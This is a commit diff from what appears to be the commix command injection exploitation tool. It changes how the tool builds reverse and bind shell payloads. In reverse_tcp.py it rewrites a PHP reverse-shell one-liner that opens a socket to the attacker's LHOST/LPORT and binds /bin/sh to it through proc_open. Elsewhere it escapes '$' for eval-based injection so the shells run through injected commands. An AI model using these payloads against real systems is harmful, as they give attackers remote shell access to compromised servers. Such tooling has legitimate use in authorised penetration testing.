Minor update regarding "PHP-reverse-shell" payload

src/core/requests/requests.py

@@ -261,6 +261,7 @@ def estimate_response_time(url, timesec, http_request_method):
 Exceptions regarding requests failure(s)
 """
 def request_failed(err_msg):
+
   settings.VALID_URL = False
 
   try:

src/core/shells/bind_tcp.py

@@ -323,6 +323,8 @@ def bind_tcp_options(separator):
     # Option 2 - Other (Netcat-Without-Netcat) shells
     elif bind_tcp_option == '2' :
       bind_tcp_option = other_bind_shells(separator)
+      if settings.EVAL_BASED_STATE != False:
+        bind_tcp_option = bind_tcp_option.replace("$","\\$")
       if bind_tcp_option.lower() not in settings.SHELL_OPTIONS:
         checks.shell_success("bind")
         break

src/core/shells/reverse_tcp.py

@@ -116,7 +116,7 @@ def other_reverse_shells(separator):
     # PHP-reverse-shell
     if other_shell == '1':
       other_shell = "php -r '$sock=fsockopen(\"" + settings.LHOST + "\"," + settings.LPORT + ");" \
-                    "exec(\"/bin/sh -i <%263 >%263 2>%263\");'"
+                    "$proc=proc_open(\"/bin/sh -i\",array(0%3d>$sock,1%3d>$sock,2%3d>$sock),$pipes);'"
       break
 
     # Perl-reverse-shell
@@ -500,6 +500,8 @@ def reverse_tcp_options(separator):
     # Option 2 - Other (Netcat-Without-Netcat) shells
     elif reverse_tcp_option == '2' :
       reverse_tcp_option = other_reverse_shells(separator)
+      if settings.EVAL_BASED_STATE != False:
+        reverse_tcp_option = reverse_tcp_option.replace("$","\\$")
       if reverse_tcp_option.lower() not in settings.SHELL_OPTIONS:
         checks.shell_success("reverse")
         break

src/utils/settings.py

@@ -262,7 +262,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.0"
-REVISION = "105"
+REVISION = "106"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE: